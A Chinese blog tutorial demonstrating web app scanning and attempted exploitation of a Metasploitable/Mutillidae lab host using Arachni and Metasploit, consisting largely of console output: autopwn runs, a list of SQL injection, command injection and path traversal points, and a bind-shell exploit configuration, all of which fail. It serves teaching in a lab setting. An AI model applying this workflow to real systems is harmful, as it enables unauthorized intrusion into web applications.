WebApp exploitation with Arachni and Metasploit
arachni作为一款开源的扫描软件,在判断web脚本漏洞上的效率和精确度还是让人称赞的,arachni作为一款主流的开源扫描软件,当然要跟随趋势,可以很好的和metasploit配合使用,通过msf plugin,与metasploit达到无缝对接。
今天我们演示arachni与metasploit配合对网站进行扫描检测和入侵。我的测试环境为
metasploitable+backbox+arachni+metasploit
首先我们通过arachni来对目标机进行扫描,看图说话,不多累赘:
root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory Arachni - Web Application Security Scanner Framework v0.4.2 Author: Tasos "Zapotek" Laskos (With the support of the community and the Arachni Team.) Website: http://arachni-scanner.com Documentation: http://arachni-scanner.com/wiki [~] No modules were specified. [~] -> Will run all mods. [~] No audit options were specified. [~] -> Will audit links, forms and cookies.
通过扫描,保存扫描日志为msf格式,以便于metasploit调用。
为了引入arachni的plugin到metasploit,我们需找到arachni的目录,复制external/metasploit到metasploit的根目录下面
cp -R arachni/external/metasploit/* /opt/backbox/msf/
然后运行metasploit,加载arachni插件,运行如下图
root@metasploit:~# msfconsole [!] Warning: This tool is located in /opt/backbox/msf [i] Remember to give the full absolute path when specifying a file # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.8.0-dev [core:4.8 api:1.0] + -- --=[ 1168 exploits - 641 auxiliary - 186 post + -- --=[ 312 payloads - 30 encoders - 8 nops msf > load arachni [+] Added 1 Auxiliary modules for Arachni [+] Added 4 Exploit modules for Arachni [*] Successfully loaded plugin: arachni msf > arachni_load /root/localhost.afr.msf [*] Loading report... [*] Loaded 21 vulnerabilities. Unique exploits =============== ID Exploit Description -- ------- ----------- 1 auxiliary/arachni_sqlmap
我们看下arachni的自动攻击参数
msf > arachni_autopwn [*] Usage: arachni_autopwn [options] -h Display this help text -x [regexp] Only run modules whose name matches the regex -a Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port (default) -m Use a meterpreter shell (if possible) -q Disable exploit module output
我们选择加载所有的溢出来进行匹配
msf > arachni_autopwn -a [*] Running pwn-jobs... [*] [0 established sessions]): Waiting on 21 launched modules to finish execution... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running auxiliary/arachni_sqlmap [*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running exploit/unix/webapp/arachni_path_traversal [*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running exploit/unix/webapp/arachni_path_traversal [*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ... [*] [0 established sessions]): Waiting on 3 launched modules to finish execution... [*] Running exploit/unix/webapp/arachni_exec [*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Running exploit/unix/webapp/arachni_path_traversal [*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Started bind handler [*] Running exploit/unix/webapp/arachni_path_traversal [*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ... [*] Sending HTTP request for /mutillidae/index.php [*] [0 established sessions]): Waiting on 0 launched modules to finish execution... [*] The autopwn command has completed with 0 sessions
很不幸,木有一个成功的…………
接下来我们要看下arachni到底扫描出来了哪些漏洞,执行如下命令:
msf > arachni_list_vulns Vulnerabilities =============== ID Host Path Name Method Params Exploit -- ---- ---- ---- ------ ------ ------- 1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap 2 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap 3 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"} auxiliary/arachni_sqlmap 4 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap 5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap 6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap 7 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap 8 192.168.1.35 /mutillidae/index.php SQL Injection POST {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"} auxiliary/arachni_sqlmap 9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap 10 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap 11 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"} auxiliary/arachni_sqlmap 12 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"} auxiliary/arachni_sqlmap 13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap 14 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"} auxiliary/arachni_sqlmap 15 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"} auxiliary/arachni_sqlmap 16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap 17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec 18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal 19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal 20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"} unix/webapp/arachni_path_traversal 21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
msf> arachni_manual 17 [*] Using unix/webapp/arachni_exec . [*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... SRVHOST => 127.0.0.1 SRVPORT => 10401 RHOST => 192.168.1.35 RPORT => 80 LHOST => 127.0.0.1 LPORT => 5376 SSL => false POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS METHOD => POST COOKIES => HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c PATH => /mutillidae/index.php [*] Done! PAYLOAD => cmd/unix/bind_perl msf exploit(arachni_exec) >
看下配置有没有问题,木有问题就开始执行,
msf exploit(arachni_exec) > show options Module options (exploit/unix/webapp/arachni_exec): Name Current Setting Required Description ---- --------------- -------- ----------- COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) GET no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) PATH /mutillidae/index.php yes The path to the vulnerable script. POST target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) Proxies no Use a proxy chain RHOST 192.168.1.35 yes The target address RPORT 80 yes The target port VHOST no HTTP server virtual host Payload options (cmd/unix/bind_perl): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 5376 yes The listen port RHOST 192.168.1.35 no The target address Exploit target: Id Name -- ---- 0 Automatic
看来是应该没问题了,手动执行一下,看看最近攒的人品攒够了没
-_-!!!人品不好,两次都没成功
msf exploit(arachni_exec) > exploit [*] Started bind handler [*] Sending HTTP request for /mutillidae/index.php msf exploit(arachni_exec) > exploit [*] Started bind handler [*] Sending HTTP request for /mutillidae/index.php msf exploit(arachni_exec) >
今天的这个测试环境很不给面子啊,一个都没成功,不过这里只是给大家展示,如何利用arachni和metasploit对一个web进行检测和入侵的过程,简单的吹水,高手请自动忽略,有问题请留言!!
上一篇: 我是怎么赚到人生的第一个百万的
下一篇: 访谈高春辉:专注产品才是王道